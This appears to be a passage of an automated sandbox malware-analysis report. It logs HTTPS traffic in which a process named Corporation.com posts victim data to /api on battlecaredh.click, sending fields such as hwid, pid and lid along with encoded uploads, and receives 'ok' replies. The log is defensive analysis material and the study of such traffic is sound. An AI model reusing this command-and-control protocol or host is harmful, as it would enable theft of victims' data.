                                                                                                                                                  Set-Cookie: PHPSESSID=pqrdtoqr786p9vlhqief9n4e62; expires=Thu, 24 Apr 2025 09:23:25 GMT; Max-Age=9999999; path=/
                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                  vary: accept-encoding
                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Xhzhm3%2BkjRYsyXLmsAOEz4eSQHK%2BGpdx7%2FkaGwJI2fwH5id%2FSE%2Fi3MXh05P%2BzFi6hNGnG4lsRMcFNBCCeL97jtJ%2FeWdVRUpGScKCmWPS340gaxpw4jCFnBlQ5E3POeXD%2FHGhKxo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                  Server: cloudflare
                                                                                                                                                  CF-RAY: 8f9ade18df631875-EWR
                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1660&min_rtt=1628&rtt_var=633&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=980&delivery_rate=1793611&cwnd=153&unsent_bytes=0&cid=64b340a14ae23ed5&ts=796&x=0"
                                                                                                                                                  2024-12-29 15:36:46 UTC232INData Raw: 34 66 33 34 0d 0a 74 66 5a 78 7a 30 2f 38 5a 76 69 34 58 66 76 45 38 76 42 62 62 42 68 35 6e 59 63 65 50 67 66 46 5a 6f 57 53 6c 6d 49 39 45 79 2f 4f 31 41 66 74 64 63 68 4b 32 73 73 34 32 66 36 47 67 69 34 4a 4e 46 76 38 34 7a 77 45 59 61 51 4b 39 76 65 36 51 45 74 2b 44 59 2b 51 45 4b 4d 38 6d 55 72 61 33 53 58 5a 2f 71 6d 4c 65 51 6c 32 57 36 65 6c 65 31 52 6c 70 41 72 6e 38 2f 30 4e 54 58 39 4d 33 5a 6f 57 70 79 71 66 41 70 6e 55 4d 4a 36 68 6c 35 45 78 41 6e 45 55 39 65 6f 38 45 69 57 67 48 4b 65 6f 74 43 39 59 5a 30 37 34 6c 77 4b 6b 62 59 46 4b 67 35 6f 34 6c 65 62 49 30 6a 6f 4a 65 68 58 37 34 33 56 57 62 36 30 43 35 76 62 38 45 6c 52 31 52 39 32 55 46 61 59 67 6c 68 61 55 33 6a
                                                                                                                                                  Data Ascii: 4f34tfZxz0/8Zvi4XfvE8vBbbBh5nYcePgfFZoWSlmI9Ey/O1AftdchK2ss42f6Ggi4JNFv84zwEYaQK9ve6QEt+DY+QEKM8mUra3SXZ/qmLeQl2W6ele1RlpArn8/0NTX9M3ZoWpyqfApnUMJ6hl5ExAnEU9eo8EiWgHKeotC9YZ074lwKkbYFKg5o4lebI0joJehX743VWb60C5vb8ElR1R92UFaYglhaU3j
                                                                                                                                                  2024-12-29 15:36:46 UTC1369INData Raw: 65 56 70 35 32 52 65 55 41 36 48 4f 65 6c 4a 42 77 32 6c 51 66 32 34 65 45 4e 54 33 63 4e 79 4e 6f 4b 37 53 71 53 52 4d 4b 61 4e 35 57 6f 6c 5a 45 32 43 58 73 62 37 65 70 38 58 32 32 76 41 4f 33 2f 2b 77 39 52 65 30 72 66 6e 52 53 69 4b 70 59 43 6c 64 6c 2f 31 2b 61 58 69 6e 6c 57 4f 6a 76 76 35 6e 39 49 61 4c 5a 45 2b 4c 37 74 51 46 68 39 44 59 2f 55 46 61 4d 73 6b 77 53 49 30 6a 53 53 6f 34 4b 5a 4d 41 4e 33 47 2f 4c 76 63 31 39 6c 6f 41 37 74 2f 2f 34 45 55 6e 78 4c 31 35 52 54 34 32 32 5a 48 4e 71 43 66 37 71 6a 67 4a 55 31 47 44 67 68 76 2f 6f 79 52 53 57 67 43 4b 65 6f 74 41 68 61 63 6b 37 63 6d 78 43 6c 4a 6f 77 45 69 4e 77 79 6e 4c 53 57 6c 7a 63 45 65 51 6e 31 36 33 70 66 62 4b 77 4e 34 76 66 77 51 42 45 78 53 73 2f 55 53 2b 30 4d 6b 77 2b 57 30
                                                                                                                                                  Data Ascii: eVp52ReUA6HOelJBw2lQf24eENT3cNyNoK7SqSRMKaN5WolZE2CXsb7ep8X22vAO3/+w9Re0rfnRSiKpYCldl/1+aXinlWOjvv5n9IaLZE+L7tQFh9DY/UFaMskwSI0jSSo4KZMAN3G/Lvc19loA7t//4EUnxL15RT422ZHNqCf7qjgJU1GDghv/oyRSWgCKeotAhack7cmxClJowEiNwynLSWlzcEeQn163pfbKwN4vfwQBExSs/US+0Mkw+W0
                                                                                                                                                  2024-12-29 15:36:46 UTC1369INData Raw: 61 67 43 73 4f 64 67 6e 7a 37 33 70 54 61 4b 74 45 71 62 44 7a 47 42 38 70 44 66 32 58 42 36 34 6e 33 44 47 5a 31 44 47 65 73 4e 43 4e 64 78 63 36 48 50 4f 6c 4a 42 78 6f 70 67 7a 68 34 76 73 4e 58 48 39 44 32 4a 45 63 70 53 32 65 43 5a 2f 65 4e 4a 4b 6c 6e 5a 59 72 42 48 6f 54 2b 75 52 32 56 69 58 70 52 4f 44 6f 74 46 67 66 51 46 72 63 31 69 61 75 49 35 41 44 6a 4a 6f 67 31 37 2f 51 6c 54 56 4f 49 6c 76 79 37 58 6c 5a 61 71 59 4f 36 66 58 2b 44 46 64 2f 54 73 57 62 46 36 30 68 6c 67 36 58 31 44 75 52 72 35 75 5a 50 77 35 37 45 62 2b 72 50 46 74 39 35 31 79 6e 78 50 4d 4d 55 6e 34 50 34 70 63 64 6f 79 71 49 52 49 57 55 4a 74 6d 68 6e 4e 4a 68 54 6e 59 53 2f 2b 35 32 57 47 57 67 43 65 4c 7a 38 77 4e 53 64 6b 66 5a 6b 78 65 68 4a 4a 4d 43 6d 74 30 37 6e 4c
                                                                                                                                                  Data Ascii: agCsOdgnz73pTaKtEqbDzGB8pDf2XB64n3DGZ1DGesNCNdxc6HPOlJBxopgzh4vsNXH9D2JEcpS2eCZ/eNJKlnZYrBHoT+uR2ViXpRODotFgfQFrc1iauI5ADjJog17/QlTVOIlvy7XlZaqYO6fX+DFd/TsWbF60hlg6X1DuRr5uZPw57Eb+rPFt951ynxPMMUn4P4pcdoyqIRIWUJtmhnNJhTnYS/+52WGWgCeLz8wNSdkfZkxehJJMCmt07nL
                                                                                                                                                  2024-12-29 15:36:46 UTC1369INData Raw: 54 6e 45 75 38 66 4d 38 51 79 75 2b 52 4f 44 38 74 46 67 66 65 45 54 46 6d 68 32 6b 49 4a 67 4d 6e 64 51 79 6b 71 43 62 6c 54 34 49 64 78 50 79 34 48 39 64 59 61 30 57 35 50 76 2b 44 56 55 78 41 35 65 54 43 2b 31 31 33 69 4f 57 38 79 2b 43 74 49 62 53 4a 6b 42 6a 57 2f 6a 70 50 41 51 6c 70 41 76 75 2f 2f 77 49 55 48 35 4a 32 5a 49 56 6f 43 69 52 44 6f 6a 53 4d 5a 53 74 6e 35 6b 72 44 6e 63 66 38 2b 46 30 56 32 2f 6e 53 71 66 33 37 45 41 48 4d 58 6a 61 6d 78 4f 75 4f 39 34 62 31 4d 4e 2f 6e 71 72 51 79 6e 6b 43 64 42 76 77 36 58 42 58 62 61 59 49 36 66 66 78 43 56 64 35 58 39 61 51 47 36 77 6a 6b 51 57 65 33 7a 71 64 6f 5a 53 55 4e 6b 34 30 57 2f 6a 39 50 41 51 6c 69 43 50 53 73 74 55 36 48 32 34 44 7a 74 51 55 6f 57 33 47 52 4a 62 5a 4d 35 47 70 6c 70 73
                                                                                                                                                  Data Ascii: TnEu8fM8Qyu+ROD8tFgfeETFmh2kIJgMndQykqCblT4IdxPy4H9dYa0W5Pv+DVUxA5eTC+113iOW8y+CtIbSJkBjW/jpPAQlpAvu//wIUH5J2ZIVoCiRDojSMZStn5krDncf8+F0V2/nSqf37EAHMXjamxOuO94b1MN/nqrQynkCdBvw6XBXbaYI6ffxCVd5X9aQG6wjkQWe3zqdoZSUNk40W/j9PAQliCPSstU6H24DztQUoW3GRJbZM5Gplps
                                                                                                                                                  2024-12-29 15:36:46 UTC1369INData Raw: 37 2f 76 64 31 68 6d 6f 77 48 6f 38 66 55 47 54 58 5a 45 78 5a 6f 65 6f 69 57 57 44 5a 76 65 4f 70 53 67 6e 4a 67 34 43 58 51 56 39 36 55 79 48 47 4b 2f 52 4c 2b 77 31 52 42 45 59 31 76 61 74 52 36 69 62 59 46 4b 67 35 6f 34 6c 65 62 49 30 6a 41 63 66 68 62 74 37 48 74 53 61 71 51 57 35 76 33 2f 45 6c 68 2b 53 64 43 59 46 61 49 72 6e 77 47 51 31 6a 69 63 72 5a 2b 65 65 55 41 36 48 4f 65 6c 4a 42 78 4c 72 42 66 77 38 2f 6f 4c 53 57 6f 4e 79 4e 6f 4b 37 53 71 53 52 4d 4b 61 50 4a 4b 74 6c 4a 49 31 44 6e 34 57 2f 2f 64 7a 57 32 4b 75 44 2f 58 36 38 77 64 55 65 55 62 59 6b 67 47 68 49 34 77 42 69 4d 68 2f 31 2b 61 58 69 6e 6c 57 4f 69 33 34 39 57 78 66 4a 35 59 53 35 4f 62 2f 44 56 4d 78 55 70 6d 4e 55 36 6f 68 33 6c 7a 61 33 44 43 51 70 5a 2b 54 4d 41 4a 33
                                                                                                                                                  Data Ascii: 7/vd1hmowHo8fUGTXZExZoeoiWWDZveOpSgnJg4CXQV96UyHGK/RL+w1RBEY1vatR6ibYFKg5o4lebI0jAcfhbt7HtSaqQW5v3/Elh+SdCYFaIrnwGQ1jicrZ+eeUA6HOelJBxLrBfw8/oLSWoNyNoK7SqSRMKaPJKtlJI1Dn4W//dzW2KuD/X68wdUeUbYkgGhI4wBiMh/1+aXinlWOi349WxfJ5YS5Ob/DVMxUpmNU6oh3lza3DCQpZ+TMAJ3
                                                                                                                                                  2024-12-29 15:36:46 UTC1369INData Raw: 51 63 58 61 77 4b 31 66 50 76 51 45 41 2f 56 4a 65 54 48 2b 31 31 33 67 65 64 32 54 36 54 72 35 79 64 50 67 70 6f 45 66 6a 33 66 56 31 75 71 67 6a 6e 2f 66 6b 4b 58 6e 68 41 32 35 6b 55 71 69 4b 62 52 4e 53 61 4f 49 48 6d 79 4e 49 59 41 33 45 58 70 4c 38 38 51 79 75 2b 52 4f 44 38 74 46 67 66 63 55 66 53 6e 68 36 75 49 70 30 57 6d 39 77 74 6d 61 75 61 67 44 4d 46 66 78 62 79 36 48 39 61 59 36 77 49 39 66 6e 30 41 31 51 78 41 35 65 54 43 2b 31 31 33 69 65 4e 7a 44 57 65 71 6f 61 5a 4f 41 31 73 46 75 2b 6c 4d 68 78 30 6f 42 57 6e 71 4f 49 51 53 48 5a 53 6d 59 31 54 71 69 48 65 58 4e 72 63 4e 70 2b 68 6c 70 77 72 43 33 77 55 38 4f 78 31 57 47 32 6b 42 4f 50 30 38 77 56 63 66 55 62 51 6c 78 79 70 4a 4a 41 4e 6c 5a 70 78 32 61 47 49 30 6d 46 4f 57 77 44 38 36
                                                                                                                                                  Data Ascii: QcXawK1fPvQEA/VJeTH+113ged2T6Tr5ydPgpoEfj3fV1uqgjn/fkKXnhA25kUqiKbRNSaOIHmyNIYA3EXpL88Qyu+ROD8tFgfcUfSnh6uIp0Wm9wtmauagDMFfxby6H9aY6wI9fn0A1QxA5eTC+113ieNzDWeqoaZOA1sFu+lMhx0oBWnqOIQSHZSmY1TqiHeXNrcNp+hlpwrC3wU8Ox1WG2kBOP08wVcfUbQlxypJJANlZpx2aGI0mFOWwD86
                                                                                                                                                  2024-12-29 15:36:46 UTC1369INData Raw: 31 42 2b 36 77 75 6b 42 59 61 51 32 50 31 44 4f 6d 4f 35 73 44 6a 4a 67 4b 6d 71 69 65 6c 53 39 4f 5a 53 53 78 70 58 30 63 50 5a 34 64 70 2b 61 30 57 41 30 2f 44 63 58 55 53 2b 31 71 6e 52 61 49 33 44 79 50 70 64 65 73 42 79 6c 73 45 66 6a 31 65 30 74 71 35 30 71 6e 2f 37 52 59 5a 6a 46 45 30 49 38 43 75 79 43 4f 41 39 72 6c 63 64 6d 2b 30 4d 70 35 4f 33 6b 56 38 65 4a 71 54 53 69 41 45 75 33 33 35 41 64 49 66 67 32 5a 31 42 58 74 64 63 31 4b 32 74 34 75 32 66 37 41 77 47 4a 62 4b 55 79 76 74 32 4d 53 66 4f 63 53 70 36 69 6d 54 68 39 6a 44 59 2f 55 56 4b 34 2f 6a 41 4b 5a 7a 44 7a 65 6d 4b 36 31 49 77 4e 38 44 4f 37 62 51 6c 74 2f 71 67 4c 77 34 62 67 56 58 48 39 44 30 49 4a 54 34 32 32 52 52 4d 4c 6a 66 39 48 6d 72 39 78 35 46 6a 70 44 76 39 42 2f 55 6d
                                                                                                                                                  Data Ascii: 1B+6wukBYaQ2P1DOmO5sDjJgKmqielS9OZSSxpX0cPZ4dp+a0WA0/DcXUS+1qnRaI3DyPpdesBylsEfj1e0tq50qn/7RYZjFE0I8CuyCOA9rlcdm+0Mp5O3kV8eJqTSiAEu335AdIfg2Z1BXtdc1K2t4u2f7AwGJbKUyvt2MSfOcSp6imTh9jDY/UVK4/jAKZzDzemK61IwN8DO7bQlt/qgLw4bgVXH9D0IJT422RRMLjf9Hmr9x5FjpDv9B/Um
                                                                                                                                                  2024-12-29 15:36:46 UTC1369INData Raw: 73 4f 4a 41 42 79 4d 44 6c 34 5a 54 39 57 33 5a 42 34 6a 49 4f 5a 71 77 6b 39 55 48 4d 46 30 56 2b 4f 52 71 54 48 4b 6f 4f 74 6e 6c 39 77 35 52 64 6c 76 47 31 46 33 74 49 74 35 63 6f 35 70 33 32 5a 6e 65 30 69 46 4f 49 6c 76 4b 35 6e 4a 53 59 72 45 56 71 74 66 36 42 31 35 6e 58 63 43 62 55 2b 4e 74 6d 45 54 43 69 48 48 5a 6f 6f 48 53 59 56 34 6f 51 4b 71 32 4b 77 77 33 75 45 72 2b 73 4f 4a 41 42 79 4d 44 6c 34 5a 54 39 57 33 5a 42 34 6a 49 4f 5a 71 77 6b 39 55 48 4d 46 30 56 2b 4f 52 71 54 48 4b 6f 53 38 6e 47 31 54 35 68 5a 45 37 5a 6d 68 53 37 50 4e 35 4b 32 74 56 2f 77 5a 2f 51 32 6e 6b 78 4e 46 76 6e 70 53 51 63 55 4b 51 4b 36 66 66 69 45 52 4a 57 51 39 43 56 42 62 30 36 6b 55 75 30 37 42 37 5a 36 4e 43 55 65 56 59 6f 56 62 2f 68 62 52 77 39 39 31 61
                                                                                                                                                  Data Ascii: sOJAByMDl4ZT9W3ZB4jIOZqwk9UHMF0V+ORqTHKoOtnl9w5RdlvG1F3tIt5co5p32Zne0iFOIlvK5nJSYrEVqtf6B15nXcCbU+NtmETCiHHZooHSYV4oQKq2Kww3uEr+sOJAByMDl4ZT9W3ZB4jIOZqwk9UHMF0V+ORqTHKoS8nG1T5hZE7ZmhS7PN5K2tV/wZ/Q2nkxNFvnpSQcUKQK6ffiERJWQ9CVBb06kUu07B7Z6NCUeVYoVb/hbRw991a
                                                                                                                                                  2024-12-29 15:36:46 UTC1369INData Raw: 31 39 2f 53 70 66 61 55 37 56 74 78 6b 53 33 79 44 69 4a 70 64 44 63 65 51 49 36 51 37 2f 6f 62 6c 74 31 70 45 6a 67 36 76 4e 41 51 44 39 55 6c 34 4a 54 39 58 37 51 52 49 69 61 5a 39 6e 68 6e 70 38 34 44 58 51 59 37 66 64 36 58 33 4f 6b 51 39 6e 4f 32 52 4a 59 59 55 36 56 70 52 36 70 4f 34 73 48 69 74 30 42 70 34 75 43 6c 53 6b 4e 4f 44 66 34 36 48 42 69 57 35 41 56 34 4f 43 32 4a 6c 78 6e 54 70 66 61 55 37 56 74 78 6b 53 33 79 44 69 4a 70 64 4b 2b 50 67 4e 32 57 2b 43 72 5a 52 78 7a 35 31 79 30 76 72 51 53 48 79 6b 4e 6b 4a 63 42 76 79 75 64 45 70 6d 64 41 61 65 4c 67 70 55 70 44 54 67 71 38 75 46 71 53 57 61 33 41 39 6e 4f 32 52 4a 59 59 55 36 56 73 53 6e 76 48 49 67 48 6d 74 51 34 32 65 6a 51 69 6e 6c 57 4f 6a 62 74 34 6d 78 66 4a 34 49 2b 70 63 48 69
                                                                                                                                                  Data Ascii: 19/SpfaU7VtxkS3yDiJpdDceQI6Q7/oblt1pEjg6vNAQD9Ul4JT9X7QRIiaZ9nhnp84DXQY7fd6X3OkQ9nO2RJYYU6VpR6pO4sHit0Bp4uClSkNODf46HBiW5AV4OC2JlxnTpfaU7VtxkS3yDiJpdK+PgN2W+CrZRxz51y0vrQSHykNkJcBvyudEpmdAaeLgpUpDTgq8uFqSWa3A9nO2RJYYU6VsSnvHIgHmtQ42ejQinlWOjbt4mxfJ4I+pcHi


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  2192.168.2.449742104.21.32.14433448C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.com
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  2024-12-29 15:36:48 UTC277OUTPOST /api HTTP/1.1
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Content-Type: multipart/form-data; boundary=N9FVVOM0QP3
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                  Content-Length: 18120
                                                                                                                                                  Host: battlecaredh.click
                                                                                                                                                  2024-12-29 15:36:48 UTC15331OUTData Raw: 2d 2d 4e 39 46 56 56 4f 4d 30 51 50 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 34 36 35 34 44 46 36 45 41 46 30 46 43 45 36 42 43 35 31 30 42 33 35 42 42 42 35 35 46 39 41 0d 0a 2d 2d 4e 39 46 56 56 4f 4d 30 51 50 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4e 39 46 56 56 4f 4d 30 51 50 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 54 52 4f 4e 0d 0a 2d 2d 4e 39 46 56 56 4f 4d 30 51 50 33 0d 0a 43 6f 6e 74 65
                                                                                                                                                  Data Ascii: --N9FVVOM0QP3Content-Disposition: form-data; name="hwid"14654DF6EAF0FCE6BC510B35BBB55F9A--N9FVVOM0QP3Content-Disposition: form-data; name="pid"2--N9FVVOM0QP3Content-Disposition: form-data; name="lid"hRjzG3--TRON--N9FVVOM0QP3Conte
                                                                                                                                                  2024-12-29 15:36:48 UTC2789OUTData Raw: 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11 d5 14 88 8d cc 54 77 94 6d 93 be 93 15 d7 52 9c
                                                                                                                                                  Data Ascii: f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECaTwmR
                                                                                                                                                  2024-12-29 15:36:49 UTC1133INHTTP/1.1 200 OK
                                                                                                                                                  Date: Sun, 29 Dec 2024 15:36:49 GMT
                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: close
                                                                                                                                                  Set-Cookie: PHPSESSID=h6k8musq4vhkbon9r9grkivg3h; expires=Thu, 24 Apr 2025 09:23:27 GMT; Max-Age=9999999; path=/
                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                  vary: accept-encoding
                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dTdRvHVvSXllVVABWMCy9xVWNllT%2Fecn2mT86Oeg2f8EMdPt0boSGBl%2FN0AqM1XJIgmSlSZWO35zD62NbDHuuWZtCoBqVr%2BQNL%2BwqeijIJup6i7KiUTaGI0ZlRCHFOYA9AL9Ksc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                  Server: cloudflare
                                                                                                                                                  CF-RAY: 8f9ade274c261875-EWR
                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1638&min_rtt=1618&rtt_var=621&sent=9&recv=21&lost=0&retrans=0&sent_bytes=2848&recv_bytes=19077&delivery_rate=1804697&cwnd=153&unsent_bytes=0&cid=ad19493b93869491&ts=1035&x=0"
                                                                                                                                                  2024-12-29 15:36:49 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                  Data Ascii: fok 8.46.123.189
                                                                                                                                                  2024-12-29 15:36:49 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: 0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  3192.168.2.449743104.21.32.14433448C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.com
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  2024-12-29 15:36:50 UTC280OUTPOST /api HTTP/1.1
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Content-Type: multipart/form-data; boundary=UVVWAL0WYLLDG9K
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                  Content-Length: 8765
                                                                                                                                                  Host: battlecaredh.click
                                                                                                                                                  2024-12-29 15:36:50 UTC8765OUTData Raw: 2d 2d 55 56 56 57 41 4c 30 57 59 4c 4c 44 47 39 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 34 36 35 34 44 46 36 45 41 46 30 46 43 45 36 42 43 35 31 30 42 33 35 42 42 42 35 35 46 39 41 0d 0a 2d 2d 55 56 56 57 41 4c 30 57 59 4c 4c 44 47 39 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 55 56 56 57 41 4c 30 57 59 4c 4c 44 47 39 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 54 52 4f 4e 0d 0a 2d 2d 55 56 56 57 41 4c
                                                                                                                                                  Data Ascii: --UVVWAL0WYLLDG9KContent-Disposition: form-data; name="hwid"14654DF6EAF0FCE6BC510B35BBB55F9A--UVVWAL0WYLLDG9KContent-Disposition: form-data; name="pid"2--UVVWAL0WYLLDG9KContent-Disposition: form-data; name="lid"hRjzG3--TRON--UVVWAL
                                                                                                                                                  2024-12-29 15:36:51 UTC1137INHTTP/1.1 200 OK
                                                                                                                                                  Date: Sun, 29 Dec 2024 15:36:51 GMT
                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: close
                                                                                                                                                  Set-Cookie: PHPSESSID=cucvp0mr79223v20d1vo0205la; expires=Thu, 24 Apr 2025 09:23:30 GMT; Max-Age=9999999; path=/
                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                  vary: accept-encoding
                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1cGMrCbocgBvjr%2FoQQCF7GwRi2ppC6yrhK9ofgzKyh%2BmCbchbEkH%2BbIbYnWLHxTA2doDcZXXNOei%2BXeaPYItIs8RJHEQokGCJgeI22urty8sGuZX%2BkBXDALFuBNSooXCaTW%2BA%2Fw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                  Server: cloudflare
                                                                                                                                                  CF-RAY: 8f9ade36387241a6-EWR
                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1619&min_rtt=1553&rtt_var=716&sent=9&recv=15&lost=0&retrans=0&sent_bytes=2849&recv_bytes=9703&delivery_rate=1399137&cwnd=239&unsent_bytes=0&cid=dab8854cf82394a6&ts=790&x=0"
                                                                                                                                                  2024-12-29 15:36:51 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                  Data Ascii: fok 8.46.123.189
                                                                                                                                                  2024-12-29 15:36:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: 0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  4192.168.2.449744104.21.32.14433448C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.com
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  2024-12-29 15:36:52 UTC275OUTPOST /api HTTP/1.1
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Content-Type: multipart/form-data; boundary=HOYDKW4DI
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                  Content-Length: 20382
                                                                                                                                                  Host: battlecaredh.click
                                                                                                                                                  2024-12-29 15:36:52 UTC15331OUTData Raw: 2d 2d 48 4f 59 44 4b 57 34 44 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 34 36 35 34 44 46 36 45 41 46 30 46 43 45 36 42 43 35 31 30 42 33 35 42 42 42 35 35 46 39 41 0d 0a 2d 2d 48 4f 59 44 4b 57 34 44 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 48 4f 59 44 4b 57 34 44 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 54 52 4f 4e 0d 0a 2d 2d 48 4f 59 44 4b 57 34 44 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f
